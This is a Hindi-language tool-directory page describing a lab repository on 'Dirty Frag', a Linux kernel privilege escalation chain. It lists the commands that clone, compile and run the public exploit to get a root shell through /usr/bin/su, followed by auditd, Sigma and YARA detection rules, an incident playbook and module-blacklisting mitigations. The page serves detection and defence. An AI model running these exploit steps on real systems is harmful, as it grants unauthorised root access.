Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Dirty-Frag-CVE-2026-43284 — Dirty Frag पर एक रिपोर्ट, जो एक Linux Local Privilege Escalation (LPE) भेद्यता श्रृंखला है जो एक अविशेषाधिकार प्राप्त उपयोगकर्ता को रूट एक्सेस प्राप्त करने की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/kuniyal08/dirty-frag-cve-2026-43284
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणफोरेंसिकघुसपैठ का पता लगानालर्निंग और शिक्षाघटना प्रतिक्रियालैब और अभ्यास

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
kuniyal08/dirty-frag-cve-2026-43284

Dirty-Frag-CVE-2026-43284

Dirty Frag पर एक रिपोर्ट, जो एक Linux Local Privilege Escalation (LPE) भेद्यता श्रृंखला है जो एक अविशेषाधिकार प्राप्त उपयोगकर्ता को रूट एक्सेस प्राप्त करने की अनुमति देती है।

रिपॉजिटरी देखें
11 दिन पहलेअभी तक समीक्षित नहीं

Dirty-Frag-CVE-2026-43284

Dirty Frag (CVE‑2026‑43284 और CVE‑2026‑43500) — एक्सप्लॉइट पुनरुत्पादन और पहचान प्रयोगशाला

यह रिपॉजिटरी Dirty Frag लिनक्स कर्नेल स्थानीय विशेषाधिकार वृद्धि (LPE) श्रृंखला के लिए एंड‑टू‑एंड पुनरुत्पादन, पहचान इंजीनियरिंग और घटना प्रतिक्रिया का दस्तावेजीकरण करती है। Dirty Frag दो नियतिवादी तर्क दोषों—CVE‑2026‑43284 (xfrm/ESP) और CVE‑2026‑43500 (RxRPC)—को जोड़ता है ताकि एक अनप्रिविलेज्ड स्थानीय उपयोगकर्ता केवल‑पढ़ने योग्य फ़ाइलों (जैसे /usr/bin/su) के पेज कैश को अधिलेखित कर सके और रूट शेल प्राप्त कर सके।

मुख्य निष्कर्ष

  • ✅ Kali Linux 2026.1 (कर्नेल 6.18.12+kali‑amd64) पर Dirty Frag का सफलतापूर्वक शोषण किया
  • ✅ auditd सिस्कॉल‑स्तरीय पहचान नियम तैनात किए
  • ✅ क्रॉस‑प्लेटफ़ॉर्म पहचान के लिए Sigma और YARA नियम बनाए
  • ✅ एक पूर्ण घटना प्रतिक्रिया प्लेबुक विकसित किया
  • ✅ पोर्टफोलियो उपयोग के लिए स्क्रीनशॉट के साथ प्रत्येक चरण का दस्तावेजीकरण किया

यह क्यों महत्वपूर्ण है

Dirty Frag एक तर्क दोष है, मेमोरी भ्रष्टाचार नहीं। यह नियतिवादी है, 2017 से लगभग सभी लिनक्स वितरणों को प्रभावित करता है, और पूरी तरह से फ़ाइलरहित है—पारंपरिक फ़ाइल अखंडता निगरानी (AIDE, Tripwire) इसे नहीं देख सकती। सार्वजनिक PoC एक एकल C फ़ाइल है जो ESP और RxRPC दोनों पथों को जोड़ती है।

प्रयोगशाला वातावरण

घटकविवरण
हाइपरवाइज़रVirtualBox
लक्ष्य VMKali Linux 2026.1

पुनरुत्पादन चरण

1. Kali संस्करण और कर्नेल सत्यापित करें

प्रयोगशाला लक्ष्य की पुष्टि करके शुरू होती है कि लक्ष्य एक कमजोर कर्नेल चला रहा है।

root@kitploit:~
cat /etc/os-release | head -3
uname -r

📸 screenshots/pre_exploit_id.png — Kali 2026.1 रिलीज़ और कर्नेल विवरण। uname -r का आउटपुट कमजोर कर्नेल 6.18.12+kali‑amd64 दिखाता है।

2. कमजोर मॉड्यूल की जाँच करें

शोषण के लिए esp4, esp6, और rxrpc कर्नेल मॉड्यूल आवश्यक हैं।

root@kitploit:~
lsmod | grep -E "esp4|esp6|rxrpc"
modinfo esp4 esp6 rxrpc 2>/dev/null | grep -E "^(name|depends)"

📸 screenshots/module_mitigation.png — lsmod और modinfo पुष्टि करते हैं कि कमजोर मॉड्यूल उपलब्ध हैं।

3. Python संस्करण

PoC के Python‑आधारित वेरिएंट को Python 3.10+ की आवश्यकता है। हम दुभाषिया सत्यापित करते हैं।

root@kitploit:~
python3 --version

Python 3.12 स्थापित और तैयार है।

4. भेद्यता जाँचकर्ता (गैर‑विनाशकारी)

पूर्ण शोषण चलाने से पहले, एक सुरक्षित जाँच स्क्रिप्ट पुष्टि करती है कि सिस्टम कमजोर है।

root@kitploit:~
python3 poc/check_vulnerable.py

जाँचकर्ता "potentially vulnerable" रिपोर्ट करता है, जो शोषण के लिए मार्ग साफ़ करता है।

5. अनप्रिविलेज्ड उपयोगकर्ता बनाएँ

एक अनप्रिविलेज्ड testuser खाता एक हमलावर का अनुकरण करता है जिसके पास विशेष अधिकार नहीं हैं।

root@kitploit:~
sudo useradd -m testuser
sudo passwd testuser
su - testuser
id

📸 id UID 1001 दिखाता है, गैर‑रूट पहुंच की पुष्टि करता है।

6. शोषण क्लोन और निष्पादित करें

आधिकारिक V4bel PoC को अनप्रिविलेज्ड खाते से क्लोन और संकलित किया जाता है।

root@kitploit:~
git clone https://github.com/V4bel/dirtyfrag.git
cd dirtyfrag
gcc -O0 -Wall -o exp exp.c -lutil
./exp

📸 screenshots/exploit_execution.png — शोषण /usr/bin/su के पेज कैश को अधिलेखित करता है और दूषित बाइनरी को विस्फोटित करता है।

📸 screenshots/post_exploit_root.png — whoami और id आउटपुट पूर्ण रूट वृद्धि साबित करता है।

7. फ़ाइलरहित प्रकृति सत्यापित करें (डिस्क में कोई संशोधन नहीं)

शोषण केवल इन‑मेमोरी पेज कैश को दूषित करता है। डिस्क पर /usr/bin/su अपना मूल चेकसम बनाए रखता है।

root@kitploit:~
sha256sum /usr/bin/su

sha256sum शोषण के बाद भी मूल पैकेज हैश से मेल खाता है, जो डिस्क में कोई संशोधन नहीं होने की पुष्टि करता है।

8. शोषण के बाद सफ़ाई (महत्वपूर्ण!)

शोषण चलाने के बाद, पेज कैश दूषित हो जाता है। हमेशा इसे फ्लश करें:

root@kitploit:~
echo 3 | sudo tee /proc/sys/vm/drop_caches
# या सिस्टम को रीबूट करें

पहचान इंजीनियरिंग

Dirty Frag को फ़ाइल अखंडता निगरानी द्वारा पहचाना नहीं जा सकता। इसके बजाय, हम उन सिस्कॉल‑स्तरीय प्रिमिटिव पर ध्यान केंद्रित करते हैं जिनका यह उपयोग करता है।

auditd नियम

हम कस्टम auditd नियम तैनात करते हैं जो निम्नलिखित पर ट्रिगर होते हैं:

  • सॉकेट(AF_ALG) फ़ैमिली 38 और सॉकेट(AF_RXRPC) फ़ैमिली 21 का निर्माण
  • splice() सिस्कॉल का उपयोग
  • unshare(CLONE_NEWUSER | CLONE_NEWNET) नेमस्पेस निर्माण
  • अनप्रिविलेज्ड प्रक्रियाओं द्वारा setuid बाइनरी तक पढ़ने की पहुंच
root@kitploit:~
# /etc/audit/rules.d/dirtyfrag.rules
-a always,exit -F arch=b64 -S socket -F a0=38 -F uid!=0 -k dirtyfrag_af_alg
-a always,exit -F arch=b64 -S socket -F a0=21 -F uid!=0 -k dirtyfrag_rxrpc
-a always,exit -F arch=b64 -S splice -F uid!=0 -k dirtyfrag_splice
-a always,exit -F arch=b64 -S unshare -F uid!=0 -k dirtyfrag_namespace
-w /usr/bin/su -p r -k dirtyfrag_suid_read

सभी कस्टम नियम सक्रिय हैं, auditctl -l से सत्यापित।

शोषण को दूसरी बार चलाने के बाद, हम उपयोग किए गए सटीक सिस्कॉल के लिए अलर्ट देखते हैं:

  • ausearch -k dirtyfrag_af_alg testuser प्रक्रिया से AF_ALG सॉकेट निर्माण घटना दिखाता है
  • ausearch -k dirtyfrag_splice उसी PID से splice() घटना दिखाता है, एक मजबूत सहसंबंध
  • ausearch -k dirtyfrag_namespace नेमस्पेस निर्माण दिखाता है

Sigma नियम

एक Sigma नियम auditd निष्कर्षों को विक्रेता‑तटस्थ SIEM प्रारूप में अनुवादित करता है।

फ़ाइल: detection/sigma/dirty_frag_exploit.yml

YARA नियम

एक YARA नियम डिस्क और मेमोरी में Dirty Frag शोषण कोड की पहचान करने में मदद करता है।

फ़ाइल: detection/yara/dirty_frag_exploit.yar

पहचान कवरेज सारांश

घटना प्रतिक्रिया प्लेबुक

एक पूर्ण घटना प्रतिक्रिया रिपोर्ट reports/incident-dirtyfrag.md में उपलब्ध है। इसमें शामिल है:

  • कार्यकारी सारांश — Dirty Frag शोषण देखा गया
  • समझौता संकेतक (IoCs) — AF_ALG/AF_RXRPC सॉकेट निर्माण, splice() कॉल, unshare नेमस्पेस घटनाओं और गैर‑रूट प्रक्रियाओं द्वारा SUID बाइनरी निष्पादन के लिए auditd अलर्ट
  • MITRE ATT&CK मैपिंग — T1068 (Exploitation for Privilege Escalation), T1611 (Escape to Host)
  • रोकथाम और उन्मूलन कदम — मॉड्यूल ब्लैकलिस्टिंग, पेज कैश फ्लश, कर्नेल अपग्रेड
  • फ़ाइलरहित हमलों और सिस्कॉल‑स्तरीय ऑडिटिंग के महत्व के संबंध में सीखे गए सबक

शमन

तत्काल शमन (रीबूट की आवश्यकता नहीं):

root@kitploit:~
echo "install esp4 /bin/false" | sudo tee /etc/modprobe.d/dirtyfrag.conf
echo "install esp6 /bin/false" | sudo tee -a /etc/modprobe.d/dirtyfrag.conf
echo "install rxrpc /bin/false" | sudo tee -a /etc/modprobe.d/dirtyfrag.conf
sudo rmmod esp4 esp6 rxrpc 2>/dev/null

⚠️ प्रभाव: इन मॉड्यूल को अक्षम करने से IPsec VPN और AFS फ़ाइल सिस्टम कार्यक्षमता टूट जाती है।

एक उपयोग के लिए तैयार शमन स्क्रिप्ट mitigation/dirtyfrag_mitigation.sh पर शामिल है।

स्थायी समाधान: अपने कर्नेल को पैच किए गए संस्करण में अपग्रेड करें।

टूल डाउनलोड करें
कर्नेल6.18.12+kali‑amd64
शोषण PoCV4bel/dirtyfrag
पहचानauditd, Sigma, YARA
परतयह क्या देखता हैस्थिति
auditdAF_ALG/AF_RXRPC सॉकेट + splice सिस्कॉल + unshare✅ तैनात
SigmaSIEM के माध्यम से सिस्कॉल पैटर्न✅ नियम तैयार
YARAडिस्क/मेमोरी पर PoC कोड✅ नियम तैयार
FIM (AIDE/Tripwire)फ़ाइल परिवर्तन❌ अंधा – कोई डिस्क लेखन नहीं होता